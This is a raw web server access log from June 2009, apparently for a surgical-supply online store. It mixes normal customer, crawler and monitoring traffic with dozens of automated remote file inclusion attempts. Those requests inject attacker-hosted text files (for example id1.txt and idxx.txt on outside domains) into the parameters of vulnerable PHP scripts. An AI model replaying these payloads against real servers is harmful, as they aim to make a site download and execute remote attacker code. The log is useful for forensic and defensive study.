66.249.71.204 - - [28/Jun/2009:07:33:56 -0400] "GET /logs/error_log.Q107092400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.51.133.202 - - [28/Jun/2009:07:37:30 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:30 -0400] "GET /logs/access_log.Q109060100%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:30 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:31 -0400] "GET /logs/access_log.Q109050800%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:37:42 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:37:42 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:37:42 -0400] "GET /logs/access_log.Q109060100%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:37:42 -0400] "GET /logs/access_log.Q109050800%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:37:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.51.133.202 - - [28/Jun/2009:07:37:54 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:54 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:54 -0400] "GET /logs/access_log.Q109050800%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:37:54 -0400] "GET /logs/access_log.Q109060100%20%20/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.205.57.2 - - [28/Jun/2009:07:38:20 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kvartkirov.ru/top/log.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:07:38:23 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kvartkirov.ru/top/log.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
64.6.232.171 - - [28/Jun/2009:07:39:29 -0400] "GET /logs/access_log.Q109050800/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:07:39:29 -0400] "GET /logs/access_log.Q109060100/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:07:39:34 -0400] "GET /logs/error_log.Q108110900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.98.115 - - [28/Jun/2009:07:40:24 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:25 -0400] "GET /logs/access_log.Q109061400//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:25 -0400] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:27 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:27 -0400] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:27 -0400] "GET /logs/access_log.Q109061400//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:29 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:29 -0400] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:29 -0400] "GET /logs/access_log.Q109061400//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:40:43 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:40:43 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:40:43 -0400] "GET /logs/access_log.Q109052000//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:47 -0400] "GET /logs/access_log.Q109051900//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:49 -0400] "GET /logs/access_log.Q109051900//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:40:50 -0400] "GET /logs/access_log.Q109052500//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:40:52 -0400] "GET /logs/access_log.Q109051900//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:41:33 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:41:33 -0400] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:41:33 -0400] "GET /logs/access_log.Q109061400//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
70.146.35.145 - - [28/Jun/2009:07:41:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:41:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:41:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:41:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
216.75.60.116 - - [28/Jun/2009:07:41:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:41:52 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:41:52 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:41:54 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:41:54 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:41:54 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:42:01 -0400] "GET /logs/access_log.Q109053100//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:42:02 -0400] "GET /logs/access_log.Q109053100//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:08 -0400] "GET /logs/access_log.Q109061400%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:11 -0400] "GET /logs/access_log.Q109061400%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:13 -0400] "GET /logs/access_log.Q109061400%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:14 -0400] "GET /logs/access_log.Q109051900%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:42:17 -0400] "GET /logs/access_log.Q109051900//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:18 -0400] "GET /logs/access_log.Q109051900%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:42:21 -0400] "GET /logs/access_log.Q109051900%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:42:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [28/Jun/2009:07:42:56 -0400] "GET /logs/access_log.Q109052000%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:07:42:57 -0400] "GET /logs/access_log.Q109052500%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.51.133.202 - - [28/Jun/2009:07:43:16 -0400] "GET /logs/access_log.Q109050800/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:07:44:07 -0400] "GET /logs/access_log.Q109061400%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:44:36 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:44:36 -0400] "GET /logs/access_log.Q109053100%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:07:44:39 -0400] "GET /logs/access_log.Q109041900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.75.60.116 - - [28/Jun/2009:07:44:56 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:07:45:00 -0400] "GET /logs/access_log.Q109053100%20%20//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.146.35.145 - - [28/Jun/2009:07:45:03 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "http://www.acesurgical.com/trufix_sizes.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:14 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:14 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:15 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:15 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:45:18 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.71.204 - - [28/Jun/2009:07:45:57 -0400] "GET /logs/access_log.Q107101500 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [28/Jun/2009:07:46:03 -0400] "GET /logs/access_log.Q109051600//?custompluginfile%5B%5D=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.146.35.145 - - [28/Jun/2009:07:46:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG HTTP/1.1" 200 37822 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.146.35.145 - - [28/Jun/2009:07:46:17 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2126284349D3E3005FB0065+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
